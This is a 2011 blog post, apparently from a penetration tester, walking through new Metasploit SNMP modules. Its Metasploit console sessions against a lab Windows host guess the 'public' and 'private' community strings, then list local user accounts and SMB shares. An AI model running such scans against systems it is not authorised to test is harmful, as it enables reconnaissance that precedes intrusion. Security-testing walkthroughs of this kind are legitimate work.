carnal0wnage [Shared Reader]

Wednesday, March 23, 2011

New SNMP Metasploit Modules

my new favorite modules (for today) are the snmp_enumusers and snmp_enumshares modules that work against windows hosts that have snmp running.

msf > use auxiliary/scanner/snmp/
use auxiliary/scanner/snmp/aix_version
use auxiliary/scanner/snmp/snmp_enumshares

use auxiliary/scanner/snmp/cisco_config_tftp
use auxiliary/scanner/snmp/snmp_enumusers

use auxiliary/scanner/snmp/cisco_upload_file
use auxiliary/scanner/snmp/snmp_login

use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_set


msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS 192.168.100.119

RHOSTS =>
192.168.100.119
msf auxiliary(snmp_login) > run


[+] SNMP:
192.168.100.119 community string: 'public' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[+] SNMP:
192.168.100.119 community string: 'private' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[*] Validating scan results from 1 hosts...

[*] Host
192.168.100.119 provides READ-WRITE access with community 'private'
[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed


msf auxiliary(snmp_login) > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumusers) > info

...SNIP...

Description:

This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP

msf auxiliary(snmp_enumusers) > set RHOSTS
192.168.100.119
RHOSTS =>
192.168.100.119
msf auxiliary(snmp_enumusers) > run


[+]
192.168.100.119 Found Users: ASPNET, Administrator, Guest, IUSR_SRV, IWAM_SRV, SUPPORT_388945a0
[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed


msf auxiliary(snmp_enumusers) > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(snmp_enumshares) > info
...SNIP...

Description:
This module will use LanManager OID values to enumerate SMB shares on a Windows system via SNMP

msf auxiliary(snmp_enumshares) > set RHOSTS
192.168.100.119
RHOSTS =>
192.168.100.119
msf auxiliary(snmp_enumshares) > run


[+]
192.168.100.119
backup - (C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\backup)

MetaInfoBack - (C:\WINDOWS\system32\inetsrv\MetaInfoBack)

NewBackup2 - (J:\NewBackup2)

SharepointBackup - (K:\SharepointBackup)

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

No comments: